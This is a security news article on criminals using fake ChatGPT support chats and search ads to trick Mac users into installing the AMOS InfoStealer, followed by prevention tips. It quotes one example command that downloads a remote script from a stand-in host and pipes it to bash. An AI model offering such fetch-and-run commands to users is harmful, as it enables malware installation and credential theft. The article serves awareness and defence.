Cybercriminals Exploit ChatGPT to Deploy AMOS InfoStealer on Macs via Fake Tech Support Scams

Cybercriminals Exploit ChatGPT to Deploy AMOS InfoStealer on Mac Devices

In a recent cybersecurity development, threat actors have been found leveraging the widespread trust in OpenAI’s ChatGPT to distribute the AMOS InfoStealer malware, specifically targeting Mac users. This sophisticated campaign combines social engineering with technical manipulation, leading unsuspecting users to compromise their systems under the guise of seeking technical support.

Deceptive Tactics and Infection Process

The attack begins when users, experiencing issues such as sound problems on their Mac devices, search online for solutions. Cybercriminals have strategically placed malicious advertisements in search engine results, promoting a counterfeit ChatGPT support session. These ads, often appearing at the top of search results, direct users to a seemingly legitimate ChatGPT interface.

Once on the fraudulent site, users are engaged in a chat session that mimics the authentic ChatGPT experience. The chat provides a repair command, instructing users to execute it in their macOS terminal. This command is designed to download and run a remote script, initiating the malware installation process.

Technical Execution and Malware Deployment

The malicious command typically follows this pattern:

“`bash
curl -s https://malicious-website[.]com/installer.sh | bash
“`

Executing this command prompts the system to fetch a shell script from a remote server and execute it immediately. This script installs the AMOS InfoStealer, establishes persistence mechanisms, and begins exfiltrating sensitive data from the infected device.

Implications for Users and Organizations

The AMOS InfoStealer is engineered to harvest a wide array of sensitive information, including browser data, credentials, session cookies, and other stored secrets. The stolen data can be exploited for various malicious activities, such as account takeovers, lateral movement within networks, or sold on underground markets.

This campaign underscores the evolving tactics of cybercriminals who exploit the trust users place in reputable AI tools like ChatGPT. By blending social engineering with technical exploitation, attackers can deceive even vigilant users into compromising their systems.

Preventive Measures and Recommendations

To mitigate the risk of such attacks, users and organizations should adopt the following practices:

1. Verify Sources: Always ensure that support and troubleshooting resources are obtained from official and reputable sources.

2. Exercise Caution with Terminal Commands: Be wary of executing commands in the terminal, especially those provided by unverified sources.

3. Implement Security Solutions: Utilize comprehensive security software that can detect and prevent malware infections.

4. Educate Users: Regularly inform users about the latest phishing tactics and social engineering schemes to enhance their awareness and vigilance.

By staying informed and adopting proactive security measures, users can protect themselves against sophisticated cyber threats that exploit trusted platforms and tools.